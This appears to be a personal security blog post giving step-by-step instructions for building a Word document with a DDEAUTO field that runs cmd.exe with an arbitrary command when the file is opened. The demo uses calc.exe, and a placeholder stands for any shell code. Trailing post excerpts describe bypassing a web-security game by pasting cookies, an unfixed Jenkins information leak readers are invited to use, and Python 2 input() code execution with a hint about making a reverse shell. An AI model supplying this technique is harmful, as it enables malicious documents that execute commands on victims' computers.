Skip to main content

Execute Shell From MSWord

Step 1.)Open MS-Word as blank document

Step 2.)Click insert->Quick parts->Field

Step 3.)In field  Select = (formula) and click ok

Step 4.)Select the text appeared and toggle its code by right clicking it.

Step 5.)Enter following code in curly braces
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k [Shell code that you want to insert]"


explained:
DDEAUTO-> keyword to inform MSword that this is a DDE field and will auto execute  when the document is opened
command is executed which is in "        "
for example {DDEAUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe"}

Save it
Run this on your own computer and select "yes" after it will prompt for permissions
Finally it will open up calculator.

TRY IT!!

Comments

Popular posts from this blog

Solve http://xss-game.appspot.com/ Without Actually Solving It

First install web extension EditThisCookie from  http://www.editthiscookie.com/ Then open http://r00tz-web-intro.appspot.com/rootz And solve all challenges in it. They are all damn easy. when you have solved all levels in it and paste it's cookies in  http://xss-game.appspot.com/ and refresh the home page. And you will see that you have completed all the levels.

Want a P5 bug or escalate it to P3 or P4

Hello Everyone, Many months back when i was testing on hackerone and i came across Jenkins instance. So first and foremost i did directory bruteforce and found interesting thing  on Jenkins instance i reported it got closed as informational as it was a VDP (was noob back there) I came across some more programs on jenkins instance and same error also appeared there . So i searched for more instances and it was working on all of then. What was the issue? Let's say target.com is jenkins instance so if we hit http://target.com/assets/ It throws stack error giving us instance information REPORTED I reported this to jenkins https://www.jenkins.io/security/ and after some days i recieved a  mail   I was so glad that i was going to get CVE in my pocket. BUT unfortunately So i guess i wasn't getting any CVE So if anyone want any information about instance or plugins feel free to use above method if not fixed Here's Jira issue https://issues.jenki...

Can wrong code can lead to RCE?

Yes I am talking about Python input vulnerability which exists in only Python 2 version. Even code written in python 3 and  executed in python2 can be exploited. So I wrote test code in python3 and i executed in python 2 to check it Above is the following code Now it's execution It's performing some action unlike raw_input which considers everything as string. Now what if i type vulnerable code inside   And we can import any library also. Comment below to make it a reverse shell.